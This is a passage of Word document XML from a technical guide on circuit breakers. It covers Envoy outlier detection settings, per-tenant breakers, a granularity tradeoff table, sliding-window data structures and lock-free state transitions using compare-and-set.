        <w:t xml:space="preserve">  consecutive_5xx: 5              # Eject after 5 consecutive errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B37204" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  interval: 10s                   # Check every 10 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2A0347" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  base_ejection_time: 30s         # First ejection: 30 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CCB659" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  max_ejection_percent: 50        # Never eject more than 50% of hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107C6254" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  consecutive_gateway_failure: 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED4FCDF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>This is a per-host circuit breaker (called "outlier detection" in Envoy). Individual hosts are ejected from the load balancing pool when they show anomalous error rates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF5AE03" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>8.4 Per-Customer/Tenant Circuit Breaker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B216901" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In multi-tenant systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC622E2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B34F192" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Customer A's requests → [Circuit Breaker A] → Shared Backend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49245417" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Customer B's requests → [Circuit Breaker B] → Shared Backend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BADF55" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Customer A sending malformed requests that cause errors shouldn't trip the circuit for Customer B's healthy requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491685B6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.5 The Granularity Tradeoff</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239"/>
        <w:gridCol w:w="2682"/>
        <w:gridCol w:w="1414"/>
        <w:gridCol w:w="1640"/>
        <w:gridCol w:w="1375"/>
      </w:tblGrid>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="2FF06A1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147C0D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Granularity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E7A589" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Number of Circuit Breakers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C6560E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Precision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E04408" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Complexity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9EC4CA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="5885D1D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223BEF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Per-service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622247" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Few (one per dependency)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C9F18F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Low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44C6DA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Simple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8D731D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="5F9CF10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CEEDD5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Per-endpoint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86D2FB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Moderate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58AF69" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Medium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4E533D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Moderate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DC545B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Moderate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="6531DE1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D6E4A5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Per-host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0E5EA4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Many (N per service)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51851C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>High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6C3A3E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Complex</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0349C5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Higher</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="3E7FC96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22C651" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Per-host-per-endpoint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1EEBB6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Very many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45A099" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Very high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2EF49C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>High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6AD526" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="475F4465" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Best practice:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Start with per-service. Add per-endpoint granularity where you observe the "one bad endpoint poisons all" problem. Per-host is typically handled by the service mesh/load balancer layer (outlier detection).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCFC2D0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="0679C054">
          <v:rect id="_x0000_i4250" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39718386" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. Implementation Internals — How a Circuit Breaker Works Inside</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CF7CFA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.1 Data Structures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFA5FBA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The sliding window (ring buffer):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C376BC4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652E0828" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>┌─────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FBCB16" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>│ Bucket 0 │ Bucket 1 │ Bucket 2 │ ... │ Bucket N-1  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AADBB1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>│ fail: 3  │ fail: 1  │ fail: 0  │     │ fail: 12    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBAE0D3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>│ ok: 47   │ ok: 49   │ ok: 50   │     │ ok: 38      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58500273" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>│ slow: 2  │ slow: 0  │ slow: 1  │     │ slow: 5     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107AE31A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>└─────────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55671072" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">              ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEEC180" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B822E67" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">        Current bucket (newest)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3B1CA1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Each bucket stores:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C62608" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1037"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Number of successful calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56ADB6B4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1037"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Number of failed calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61470143" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1037"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Number of slow calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C085A6D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1037"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Total duration of all calls (for average latency calculation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678207CC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1037"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Timestamp of the bucket's time period.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02721539" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Aggregate metrics (cached, updated per bucket rotation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA4E5B3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0CF47F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>total_calls = sum(all buckets' success + failure + slow)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0C8F45" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>failure_rate = sum(all buckets' failures) / total_calls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E10975" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>slow_rate = sum(all buckets' slow calls) / total_calls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E349A9B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.2 Thread Safety</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231C02A1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The concurrency challenge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049D978F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Multiple threads simultaneously:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCBFDDA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1038"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Recording new outcomes (increment counters).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D650D0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1038"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Checking the circuit state (is it open? closed?).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E71361" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1038"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Transitioning state (closed → open, open → half-open).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDF4594" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Approaches:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7D3AB3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Atomic operations (lock-free):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4241A94A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1039"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Use AtomicInteger/AtomicLong for counters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C084190" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1039"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Use AtomicReference for state transitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C82EAC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1039"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>CAS (Compare-And-Swap) for state machine transitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B32B9E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1039"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>No locks → no thread contention → high throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519D098A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How state transition works atomically:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1083D55F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9D46A6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>// Attempt to transition from CLOSED to OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AC1D6E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>while (true) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF1D79B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">    State current = state.get();  // Atomic read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E93C8F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">    if (current != CLOSED) return;  // Already transitioned by another thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC51F7B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">    if (state.compareAndSet(CLOSED, OPEN)) {  // CAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745569F4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">        // I won the race — I'm responsible for the transition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCE9F4B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">        openedAt = now();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C1B839" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">        return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C50A1E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C220F92" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">    // CAS failed — another thread changed state. Loop and retry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BC1275" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771CD1BE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resilience4j's approach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A74B8E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1040"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Uses a ConcurrentHashMap-based ring buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580A3EDB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
